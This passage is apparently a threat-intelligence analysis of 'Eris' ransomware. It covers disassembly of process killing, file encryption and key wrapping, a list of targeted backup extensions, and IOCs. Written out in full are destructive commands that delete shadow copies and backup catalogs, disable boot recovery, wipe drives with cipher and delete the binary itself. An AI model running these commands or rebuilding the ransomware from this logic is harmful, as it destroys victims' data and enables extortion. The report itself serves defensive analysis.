0x0053d0a4  jne 0x53d31c
0x0053d0aa  lea eax, sym.type.Utils.PROCESSENTRY32
0x0053d0b0  mov dword [esp], eax
0x0053d0b3  call fcn.runtime.newobject
0x0053d0b8  mov eax, dword [var_4h]
0x0053d0bc  mov dword [var_48h], eax
0x0053d0c0  mov dword [eax], 0x22c
0x0053d0c6  lea ecx, sym.type._2_uintptr
0x0053d0cc  mov dword [esp], ecx
0x0053d0cf  call fcn.runtime.newobject
0x0053d0d4  mov eax, dword [var_4h]
0x0053d0d8  mov ecx, dword [var_34h]
0x0053d0dc  mov dword [eax], ecx
0x0053d0de  mov edx, dword [var_48h]
0x0053d0e2  mov dword [eax + 4], edx
0x0053d0e5  mov edx, dword [sym.pProcess32FirstW]
0x0053d0eb  mov dword [esp], edx
0x0053d0ee  mov dword [var_4h], eax
0x0053d0f2  mov dword [var_8h], 2
0x0053d0fa  mov dword [var_ch], 2
0x0053d102  call fcn.syscall___LazyProc_.Call
0x0053d107  mov eax, dword [var_10h]

If any of the running processes name contain any of the strings below, it is killed.

  • sql
  • backup
  • malware
  • server
  • http
  • apache
  • agent

Code for killing the processes:

0x005fecdc  mov ecx, dword [slice_procs]
0x005fece3  cmp edx, ecx
0x005fece5  jge 0x5fe90b
0x005feceb  mov dword [var_d4h], edx
0x005fecf2  lea ecx, [eax + edx*8]
0x005fecf5  mov ebx, dword [ecx]
0x005fecf7  mov dword [var_a4h], ebx
0x005fecfe  mov ecx, dword [ecx + 4]
0x005fed01  mov dword [var_150h], ecx
0x005fed08  mov ebp, dword [ebx + 0x10]
0x005fed0b  mov dword [esp], ecx
0x005fed0e  call ebp
0x005fed10  mov eax, dword [var_4h]
0x005fed14  mov ecx, dword [var_8h]
0x005fed18  mov dword [esp], eax
0x005fed1b  mov dword [var_4h], ecx
0x005fed1f  mov eax, dword [0x874b38] ; List of strings
0x005fed25  mov ecx, dword [0x874b3c] ; 7
0x005fed2b  mov edx, dword [0x874b40] ; 7
0x005fed31  mov dword [var_8h], eax
0x005fed35  mov dword [var_ch], ecx
0x005fed39  mov dword [var_10h], edx
0x005fed3d  call fcn.Eris_Utils.Contains
0x005fed42  movzx eax, byte [var_14h]
0x005fed47  test al, al
0x005fed49  je 0x5feccb
0x005fed4b  mov eax, dword [var_a4h]
0x005fed52  mov eax, dword [eax + 0x18]
0x005fed55  mov ecx, dword [var_150h]
0x005fed5c  mov dword [esp], ecx
0x005fed5f  call eax
0x005fed61  nop
0x005fed62  mov eax, dword [var_4h]
0x005fed66  mov dword [esp], eax
0x005fed69  call fcn.os.findProcess
0x005fed6e  mov eax, dword [var_4h]
0x005fed72  mov ecx, dword [var_8h]
0x005fed76  test ecx, ecx
0x005fed78  jne 0x5feccb
0x005fed7e  nop
0x005fed7f  nop
0x005fed80  nop
0x005fed81  mov ecx, dword [0x874a48]
0x005fed87  mov edx, dword [0x874a4c]
0x005fed8d  mov dword [esp], eax
0x005fed90  mov dword [var_4h], ecx
0x005fed94  mov dword [var_8h], edx
0x005fed98  call fcn.os___Process_.signal

Release of IP address

If the username ends with $, the IP address for the machine is released:

0x005fe90b  lea eax, [0x67505a] ; "USERNAME"
0x005fe911  mov dword [esp], eax
0x005fe914  mov dword [var_4h], 8
0x005fe91c  call fcn.os.Getenv
0x005fe921  mov eax, dword [var_8h]
0x005fe925  mov ecx, dword [var_ch]
0x005fe929  lea edx, [ecx - 1]
0x005fe92c  cmp edx, ecx
0x005fe92e  ja 0x5ff6a5
0x005fe934  mov dword [username_str], eax
0x005fe93b  sub ecx, edx
0x005fe93d  mov dword [username_str_len], ecx
0x005fe944  mov ebx, ecx
0x005fe946  neg ecx
0x005fe948  sar ecx, 0x1f
0x005fe94b  and edx, ecx
0x005fe94d  mov dword [var_d0h], edx
0x005fe954  cmp ebx, 1
0x005fe957  jne 0x5fe966
0x005fe959  movzx ecx, byte [edx + eax]
0x005fe95d  cmp cl, 0x24 ; "$"
0x005fe960  je 0x5fec2d
...
0x005fec2d  mov dword [var_190h], 0
0x005fec38  mov dword [var_194h], 0
0x005fec43  lea eax, sym.type.string
0x005fec49  mov dword [var_190h], eax
0x005fec50  lea ecx, [0x6cecb0] ; "ipconfig /release"
0x005fec56  mov dword [var_194h], ecx
0x005fec5d  lea ecx, [0x674630] ; "/C %s"
0x005fec63  mov dword [esp], ecx
0x005fec66  mov dword [var_4h], 5
0x005fec6e  lea edx, [var_190h]
0x005fec75  mov dword [var_8h], edx
0x005fec79  mov dword [var_ch], 1
0x005fec81  mov dword [var_10h], 1
0x005fec89  call fcn.fmt.Sprintf
0x005fec8e  mov eax, dword [var_14h]
0x005fec92  mov ecx, dword [var_18h]
0x005fec96  lea edx, [0x674d1b] ; "cmd.exec"
0x005fec9c  mov dword [esp], edx
0x005fec9f  mov dword [var_4h], 7
0x005feca7  mov dword [var_8h], eax
0x005fecab  mov dword [var_ch], ecx
0x005fecaf  call fcn.Eris_Utils.Execute
0x005fecb4  jmp 0x5fe966

Encrypting files

The malware walks all the disks and encrypts the files. It can perform this process “multithreaded” if a command line flag is given. In this case, it uses one Go routine for each drive. The malware skips any folders containing the following strings:

  • windows
  • windows.old
  • system volume information
  • $recycle.bin
  • program files
  • program files (x86)
  • programdata
  • i386
  • amd64
  • sysvol

It also skip the following files:

  • autoexec.bat
  • boot.ini
  • ntdetect.com
  • msdos.sys
  • io.sys
  • pagefile.sys
  • ntldr
  • config.sys
  • ntuser.dat

If the file has _FLAG_ENCRYPTED_ at the end of the file, it is skipped.

Eris overwrites and deletes backup files with the following file extensions:

$$$, $db, 001, 001, 002, 003, 113, 73b, __a, __b, ab, aba, abbu, abf, abk, abu, abu1, acp, acr, adi, adi, aea, afi, arc, arc, as4, asd, ashbak, asv, asvx, ate, ati, ba6, ba7, ba8, bac, backup, backupdb, bak, bak, bak, bak, bak, bak2, bak3, bakx, bak~, bbb, bbz, bck, bckp, bcm, bdb, bff, bif, bifx, bk1, bk1, bkc, bkf, bkp, bkp, bkup, bkz, blend1, blend2, bm3, bmk, bookexport, bpa, bpb, bpm, bpn, bps, bup, bup, caa, cbk, cbs, cbu, cenon~, ck9, cmf, crds, csd, csm, da0, dash, dba, dbk, dbk, dim, diy, dna, dov, dpb, dsb, dss, fbc, fbf, fbk, fbk, fbu, fbw, fh, fhf, flka, flkb, fpsx, ftmb, ful, fwbackup, fza, fzb, gb1, gb2, gbp, gho, ghs, gs-bck, ibk, icbu, icf, inprogress, ipd, iv2i, j01, jbk, jdc, jpa, jps, kb2, lbf, lcb, llx, mbf, mbk, mbw, mdbackup, mddata, mdinfo, mem, mig, mpb, msim, mv_, mynotesbackup, nb7, nba, nbak, nbd, nbd, nbf, nbf, nbi, nbk, nbk, nbs, nbu, nco, nda, nfb, nfc, noy, npf, nps, nrbak, nrs, nwbak, obk, oeb, old, onepkg, ori, orig, oyx, paq, pba, pbb, pbd, pbf, pbf, pbj, pbx5script, pbxscript, pdb, pfi, pqb, pqb-backup, prv, psa, ptb, pvc, pvhd, qba.tlg, qbb, qbk, qbm, qbmb, qbmd, qbx, qic, qsf, qualsoftcode, quicken2015backup, quicken2016backup, quicken2017backup, quickenbackup, qv~, rbc, rbf, rbf, rbf, rbk, rbs, rdb, rgmb, rmbak, rrr, safenotebackup, sav, sbb, sbs, sbu, sdc, sim, sis, skb, sme, sn1, sn2, sna, sns, spf, spg, spi, sps, sqb, srr, stg, sv$, sv2i, tbk, tdb, tibkp, tib, tig, tis, tlg, tmp, tmp, tmr, trn, ttbk, uci, v2i, vbk, vbm, vbox-prev, vpcbackup, vrb, w01, walletx, wbb, wbcat, wbk, win, win, wjf, wpb, wspak, wx, xbk, xlk, yrcbck, zbfx, ~cw, vib, vkb

For each file a key is generated using PBKDF2. A random password is used with the salt of [0x1,0x2,0x3,0x4,0x5,0x6,0x7,0x8] and 1000 iterations. The key is encrypted with the victim’s public key:

0x0053fc13  mov ecx, dword [0x87a654] ; rngReader from crypto/rand package
0x0053fc19  mov edx, dword [0x87a650]
0x0053fc1f  mov dword [esp], edx
0x0053fc22  mov dword [var_4h], ecx
0x0053fc26  mov dword [var_8h], eax
0x0053fc2a  mov dword [var_ch], 0x20 ; 32
0x0053fc32  mov dword [var_10h], 0x20 ; 32
0x0053fc3a  mov dword [var_14h], 0x20 ; 32
0x0053fc42  call fcn.io.ReadAtLeast
0x0053fc47  nop
0x0053fc48  lea eax, sym.type._8_uint8
0x0053fc4e  mov dword [esp], eax
0x0053fc51  call fcn.runtime.newobject
0x0053fc56  mov eax, dword [var_4h]
0x0053fc5a  mov ecx, dword [0x6ce388]
0x0053fc60  mov edx, dword [0x6ce38c]
0x0053fc66  mov dword [eax], ecx
0x0053fc68  mov dword [eax + 4], edx
0x0053fc6b  mov ecx, dword [var_12ch]
0x0053fc72  mov dword [esp], ecx
0x0053fc75  mov dword [var_4h], 0x20
0x0053fc7d  mov dword [var_8h], 0x20
0x0053fc85  mov dword [var_ch], eax
0x0053fc89  mov dword [var_10h], 8
0x0053fc91  mov dword [var_14h], 8
0x0053fc99  mov dword [var_18h], 0x3e8 ; 1000
0x0053fca1  mov dword [var_1ch], 8
0x0053fca9  lea eax, [0x68ae74]
0x0053fcaf  mov dword [var_20h], eax
0x0053fcb3  call fcn.golang.org_x_crypto_pbkdf2.Key
0x0053fcb8  mov eax, dword [var_24h]
0x0053fcbc  mov dword [var_108h], eax
0x0053fcc3  mov ecx, dword [var_2ch]
0x0053fcc7  mov dword [var_34h], ecx
0x0053fccb  mov edx, dword [var_28h]
0x0053fccf  mov dword [var_30h], edx
0x0053fcd3  mov ebx, dword [var_12ch]
0x0053fcda  mov dword [esp], ebx
0x0053fcdd  mov dword [var_4h], 0x20
0x0053fce5  mov dword [var_8h], 0x20
0x0053fced  mov ebp, dword [arg_13ch]
0x0053fcf4  mov dword [var_ch], ebp
0x0053fcf8  mov ebp, dword [arg_140h]
0x0053fcff  mov dword [var_10h], ebp
0x0053fd03  mov ebp, dword [arg_144h]
0x0053fd0a  mov dword [var_14h], ebp
0x0053fd0e  call fcn.Eris_Cryptography.RSAEncrypt

The file is encrypted with Salsa20 using the generated key for the file.

=== Preventing recovery ===

After encryption of the files, the following commands are executed:

taskkill.exe /f /im mysqld.exe
taskkill.exe /f /im sqlwriter.exe
taskkill.exe /f /im sqlserver.exe
taskkill.exe /f /im MSExchange*
taskkill.exe /f /im Microsoft.Exchange.*
vssadmin delete shadows /all /quiet
wmic shadowcopy delete
wbadmin delete catalog -quiet
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no

Code for executing the commands:

0x005fe9a6  xor eax, eax
0x005fe9a8  jmp 0x5fea59
0x005fe9ad  mov dword [var_cch], eax
0x005fe9b4  lea ecx, [esp + eax*8 + 0x200]
0x005fe9bb  mov edx, dword [ecx]
0x005fe9bd  mov ecx, dword [ecx + 4]
0x005fe9c0  mov dword [esp], edx
0x005fe9c3  mov dword [var_4h], ecx
0x005fe9c7  call fcn.runtime.convTstring
0x005fe9cc  mov eax, dword [var_8h]
0x005fe9d0  mov dword [var_190h], 0
0x005fe9db  mov dword [var_194h], 0
0x005fe9e6  lea ecx, sym.type.string
0x005fe9ec  mov dword [var_190h], ecx
0x005fe9f3  mov dword [var_194h], eax
0x005fe9fa  lea eax, [0x674630] ; "/C %s"
0x005fea00  mov dword [esp], eax
0x005fea03  mov dword [var_4h], 5
0x005fea0b  lea edx, [var_190h]
0x005fea12  mov dword [var_8h], edx
0x005fea16  mov dword [var_ch], 1
0x005fea1e  mov dword [var_10h], 1
0x005fea26  call fcn.fmt.Sprintf
0x005fea2b  mov eax, dword [var_14h]
0x005fea2f  mov ecx, dword [var_18h]
0x005fea33  lea edx, [0x674d1b] ; "cmd.exe"
0x005fea39  mov dword [esp], edx
0x005fea3c  mov dword [var_4h], 7
0x005fea44  mov dword [var_8h], eax
0x005fea48  mov dword [var_ch], ecx
0x005fea4c  call fcn.Eris_Utils.Execute
0x005fea51  mov eax, dword [var_cch]
0x005fea58  inc eax
0x005fea59  cmp eax, 0xa ; 10
0x005fea5c  jl 0x5fe9ad

For each drive letter, the malware executes /C cipher /W:%DRIVE_LETTER%: to perform a secure wipe.

0x005fea62  call fcn.Eris_Utils.GetDrive
0x005fea67  mov eax, dword [esp]
0x005fea6a  mov dword [var_16ch], eax
0x005fea71  mov ecx, dword [var_4h]
0x005fea75  mov dword [var_bch], ecx
0x005fea7c  xor edx, edx
0x005fea7e  jmp 0x5feb54
0x005fea83  mov dword [var_cch], edx
0x005fea8a  mov dword [esp], ebp
0x005fea8d  mov dword [var_4h], 1
0x005fea95  call fcn.strings.ToUpper
0x005fea9a  mov eax, dword [var_8h]
0x005fea9e  mov ecx, dword [var_ch]
0x005feaa2  mov dword [esp], eax
0x005feaa5  mov dword [var_4h], ecx
0x005feaa9  call fcn.runtime.convTstring
0x005feaae  mov eax, dword [var_8h]
0x005feab2  mov dword [var_190h], 0
0x005feabd  mov dword [var_194h], 0
0x005feac8  lea ecx, sym.type.string
0x005feace  mov dword [var_190h], ecx
0x005fead5  mov dword [var_194h], eax
0x005feadc  lea eax, [0x6775d1] ; "/C cipher /W:%s:"
0x005feae2  mov dword [esp], eax
0x005feae5  mov dword [var_4h], 0x10
0x005feaed  lea edx, [var_190h]
0x005feaf4  mov dword [var_8h], edx
0x005feaf8  mov dword [var_ch], 1
0x005feb00  mov dword [var_10h], 1
0x005feb08  call fcn.fmt.Sprintf
0x005feb0d  mov eax, dword [var_14h]
0x005feb11  mov ecx, dword [var_18h]
0x005feb15  lea edx, [0x674d1b] ; "cmd.exe"
0x005feb1b  mov dword [esp], edx
0x005feb1e  mov dword [var_4h], 7
0x005feb26  mov dword [var_8h], eax
0x005feb2a  mov dword [var_ch], ecx
0x005feb2e  call fcn.Eris_Utils.Execute

Self-removal

Finally the malware spawns a new process and exits. The spawned process first pings localhost to create a delay before it deletes the malware’s binary file.

%WINDIR%\system32\cmd.exe /C ping 127.0.0.1 -n 3 > NUL && del /Q /F "%ERIS_FILE%"

IOCs

Pay panel

  • epaybfvlutydks6fpfwtwoe2fsph6vve2obgv6qbhyuqwkecbhsf7nyd.onion

C2

  • d9d120a3.ngrok.io

Hashes

  • 2c7f9fbfd5421406bc88b62a70a570eada14d4a561689125dc8f3ef30e3afc91
  • 33f54f227c26c5abdbe5e0f994082d5b89e1df145deef703948aeb268637d9ba
  • 35fb8b1f9966d7d371cb4d513e3d63655c2357be8ef156850fe8927b13007c9e
  • 48da454be70e5f12c359965cfb55cbe5f272ddc378ae9f08876faf1b510c21b6
  • 99d19dd82330a1c437a64e7ca9896ad9d914de10c4f7aa2222b1a5bc4750f692
  • d0d6fdd6ce8eccf722c8ee72485ae96c2fe0e2fe9e451c94454f1e8be9d9283b
  • dcdf47ddca1c5f4f9bdd8528bc3e22031fbfd326ad0b4abc11e153bbd79363ec

Download STIX 2 bundle or MISP package here.